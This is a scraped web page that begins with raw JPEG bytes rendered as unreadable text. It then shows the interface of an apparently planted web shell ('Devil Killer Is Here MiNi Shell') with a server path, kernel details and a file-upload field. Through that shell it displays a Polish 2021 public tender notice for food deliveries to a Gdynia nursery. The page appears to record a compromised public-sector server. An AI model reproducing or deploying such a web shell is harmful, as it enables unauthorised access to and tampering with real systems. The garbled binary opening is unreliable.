JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211207/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211207/0030255201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Postepowanie o udzielenie zamówienia publicznego , którego przedmiotem są &#34;Dostawy żywności do oddziałów Żłobka Niezapominajka w Gdyni&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ŻŁOBEK &#34;NIEZAPOMINAJKA&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190610107</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wójta Radtkego 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-351</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 620 88 39</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">niezapominajka@zlobekgdynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zlobekgdynia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Postepowanie o udzielenie zamówienia publicznego , którego przedmiotem są &#34;Dostawy żywności do oddziałów Żłobka Niezapominajka w Gdyni&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-af651dac-4930-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00302552</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-af651dac-4930-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniPortalu https://miniportal.uzp.gov.pl/<br/>ePUAPu https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu poczty elektronicznej pod adresem : <br/>https://miniportal.uzp.gov.pl/<br/>ePUAPu https://epuap.gov.pl/wps/portal<br/>oraz poczty elektronicznej<br/>2. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>Anna Lubańska – tel. 058 620 88 39, email:niezapominajka@zlobekgdynia.pl<br/>3.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)<br/>4. zgodnie z art. 63 ust. 2 Pzp w postępowaniu o udzielenie zamówienia ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem elektronicznym. Przed złożeniem podpisanej oferty Wykonawca musi ją zaszyfrować. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.<br/> Wykonawca składa zaszyfrowaną ofertę poprzez wypełnienie „Formularza do złożenia, zmiany, wycofania oferty” udostępnego przez miniPortal (zakładka „Formularze do komunikacji”) i dostępnego na ePUAP.<br/> W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny w stosunku do osób fizycznych, działalności gospodarczych, będących dostawcami lub osób działających z upoważnienia dostawców Administratora. <br/><br/>Zgodnie z art. 13 i 14 ogólnego rozporządzenia o ochronie danych (dalej: RODO) informujemy, że: Administratorem Pani/Pana danych osobowych jest Żłobek „Niezapominajka” w Gdyni z siedzibą przy ul. Wójt Radtkego 23, 81-351 Gdynia.<br/><br/>Dane kontaktowe inspektora ochrony<br/>danych:inspektor.ins.och.danych@gmail.com.<br/><br/>Celami przetwarzania danych osobowych są:<br/>1.zawarcie i wykonanie umów łączących strony – podstawą prawną przetwarzania danych jest art. 6 ust.1 lit. b)RODO (dotyczy sytuacji, kiedy osoby, których dane dotyczą są stronami umów albo Administrator podejmuje działania z inicjatywy tych osób w celu ich zawarcia w szczególności w związku z konkursami ofert lub postępowaniami przetargowymi);<br/>2. wykonanie obowiązków prawnych ciążących na Administratorze – podstawa prawna to art. 6 ust. 1 lit. c) RODO, w szczególności związanego z obowiązkiem przechowywania dokumentacji księgowej wynikającego z ustawy o rachunkowości;<br/>3.realizacja innych celów wynikających z prawnie uzasadnionych interesów realizowanych przez Administratora na podstawie art. 6 ust. 1 lit. f) RODO takich jak: realizacja umowy, w przypadku, nie jest Pani/Pan stroną umowy, ale działa Pani/Pan z upoważnienia strony umowy, marketing bezpośredni, ustalanie, obrona i dochodzenie roszczeń, tworzenie statystyk, analiz i zestawień na potrzeby Administratora.<br/>4. Kategorie odnośnych danych osobowych, które mogą być przetwarzane w związku z umową i w celu jej sprawnej realizacji przez osoby działające z upoważnienia strony umowy takie jak: imię, nazwisko, stanowisko, zakres kompetencji, zakres upoważnienia określonego przez stronę umowy oraz dane kontaktowe takie jak nr telefonów i adresy mailowe, a w przypadkach konieczności identyfikacji uprawnień konkretnej osoby również nr PESEL albo nr dowodu tożsamości.<br/>5. Odbiorcami Pani/Pana danych osobowych mogą być: Poczta Polska, firmy kurierskie lub transportowe, firmy ubezpieczeniowe, firmy zapewniające wsparcie IT dla Administratora, partnerzy handlowi Administratora, biuro rachunkowe, firmy windykacyjne, a także banki. Ponadto w zakresie określonym przez przepisy prawa odbiorcami Pani/Pana danych osobowych mogą być również pozostali oferenci oraz osoby odwiedzające Biuletyn Informacji Publicznej Administratora.<br/>6.Administrator danych nie zamierza przekazywać danych osobowych, które Pani/Pana dotyczą do państw trzecich oraz organizacji międzynarodowych.<br/>7. Okres, przez który dane osobowe będą przechowywane: w zakresie zawartej umowy, przez okres do czasu zakończenia jej realizacji, a po tym czasie przez okres<br/>wymagany przez przepisy prawa lub do przedawnienia roszczeń.<br/>8. Ma Pani/Pan prawo do:<br/>a) żądania od Administratora dostępu do swoich danych osobowych, sprostowania swoich danych osobowych, żądania od Administratora usunięcia lub ograniczenia przetwarzania swoich danych osobowych, jeżeli Administrator nie ma uzasadnionych prawnie podstaw do ich dalszego przetwarzania, wniesienia sprzeciwu wobec przetwarzania, przenoszenia swoich danych, wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych.<br/>9. Podanie danych jest warunkiem zawarcia umowy, konsekwencją niepodania danych jest brak możliwości jej zawarcia lub realizacji.<br/>10.W oparciu o dane, które Pani/Pana dotyczą Administrator nie będzie podejmował decyzji w sposób zautomatyzowany, nie będą one także poddawane profilowaniu na zasadach określonych w art. 22 RODO.<br/>11.Źródłem, z którego Administrator otrzymuje Pani/Pana dane osobowe do celów kontaktowych niezbędnych do realizacji umów, w przypadkach, w których nie trzymaliśmy ich od Pani/Pana, są strony umów lub osoby przez nie upoważnione do ich<br/>przekazania w celu realizacji tych umów.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ŻYWIENIE DZIECI 2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 298905,76 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów spożywczych (zadanie 1) do 3 oddziałów Żłobka Niezapominajka <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Niezapominajka w Gdyni,tj. Siedziba Żłobka Niezapominajka ul. Wójta Radtkego 23, Filia Żłobka na Pogórzu ul. Porębskiego 21, Filia Żłobka na Dąbrowie ul. Wiczlińska 33, dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdej z placówek na podstawie zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12.00. Zamawiający przewiduje możliwość składania zamówień pilnych, wynikających z potrzeb Zamawiającego ,a które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Harmonogram dostawy żywności do oddziałów żłobka : <br/>ZADANIE 1 2-3 razy w tygodniu do godz.7.30, <br/>ZADANIE 2 2-3 razy w tygodniu do godz.7.30,<br/>ZADANIE 3 1 razy w tygodniu godz.12.00, <br/>ZADANIE 4 5 razy w tygodniu godz.6.00,<br/>ZADANIE 5 5 razy w tygodniu godz.6.00,<br/>ZADANIE 6 1 raz w tygodniu do godz.6.00<br/>ZADANIE 7 1 raz w tygodniu do godz.12.00<br/>ZADANIE 8 1 raz w tygodniu do godz.12.00<br/>ZADANIE 9 2-3 razy w tygodniu do godz.7.30 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 52175,04 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa warzyw i owoców ( zadanie 2) do 3 oddziałów Żłobka Niezapominajka <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Niezapominajka w Gdyni,tj. Siedziba Żłobka Niezapominajka ul. Wójta Radtkego 23, Filia Żłobka na Pogórzu ul. Porębskiego 21, Filia Żłobka na Dąbrowie ul. Wiczlińska 33, dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdej z placówek na podstawie zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12.00. Zamawiający przewiduje możliwość składania zamówień pilnych, wynikających z potrzeb Zamawiającego ,a które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Harmonogram dostawy żywności do oddziałów żłobka : <br/>ZADANIE 1 2-3 razy w tygodniu do godz.7.30, <br/>ZADANIE 2 2-3 razy w tygodniu do godz.7.30,<br/>ZADANIE 3 1 razy w tygodniu godz.12.00, <br/>ZADANIE 4 5 razy w tygodniu godz.6.00,<br/>ZADANIE 5 5 razy w tygodniu godz.6.00,<br/>ZADANIE 6 1 raz w tygodniu do godz.6.00<br/>ZADANIE 7 1 raz w tygodniu do godz.12.00<br/>ZADANIE 8 1 raz w tygodniu do godz.12.00<br/>ZADANIE 9 2-3 razy w tygodniu do godz.7.30 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 79821,93 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa nabiału ( zadanie 3) do 3 oddziałów Żłobka Niezapominajka <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Niezapominajka w Gdyni,tj. Siedziba Żłobka Niezapominajka ul. Wójta Radtkego 23, Filia Żłobka na Pogórzu ul. Porębskiego 21, Filia Żłobka na Dąbrowie ul. Wiczlińska 33, dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdej z placówek na podstawie zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12.00. Zamawiający przewiduje możliwość składania zamówień pilnych, wynikających z potrzeb Zamawiającego ,a które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Harmonogram dostawy żywności do oddziałów żłobka : <br/>ZADANIE 1 2-3 razy w tygodniu do godz.7.30, <br/>ZADANIE 2 2-3 razy w tygodniu do godz.7.30,<br/>ZADANIE 3 1 razy w tygodniu godz.12.00, <br/>ZADANIE 4 5 razy w tygodniu godz.6.00,<br/>ZADANIE 5 5 razy w tygodniu godz.6.00,<br/>ZADANIE 6 1 raz w tygodniu do godz.6.00<br/>ZADANIE 7 1 raz w tygodniu do godz.12.00<br/>ZADANIE 8 1 raz w tygodniu do godz.12.00<br/>ZADANIE 9 2-3 razy w tygodniu do godz.7.30 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 52020,10 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa mięsa i wędlin ( zadanie 4) do 3 oddziałów Żłobka Niezapominajka <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Niezapominajka w Gdyni,tj. Siedziba Żłobka Niezapominajka ul. Wójta Radtkego 23, Filia Żłobka na Pogórzu ul. Porębskiego 21, Filia Żłobka na Dąbrowie ul. Wiczlińska 33, dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdej z placówek na podstawie zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12.00. Zamawiający przewiduje możliwość składania zamówień pilnych, wynikających z potrzeb Zamawiającego ,a które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Harmonogram dostawy żywności do oddziałów żłobka : <br/>ZADANIE 1 2-3 razy w tygodniu do godz.7.30, <br/>ZADANIE 2 2-3 razy w tygodniu do godz.7.30,<br/>ZADANIE 3 1 razy w tygodniu godz.12.00, <br/>ZADANIE 4 5 razy w tygodniu godz.6.00,<br/>ZADANIE 5 5 razy w tygodniu godz.6.00,<br/>ZADANIE 6 1 raz w tygodniu do godz.6.00<br/>ZADANIE 7 1 raz w tygodniu do godz.12.00<br/>ZADANIE 8 1 raz w tygodniu do godz.12.00<br/>ZADANIE 9 2-3 razy w tygodniu do godz.7.30 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 41045,57 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span 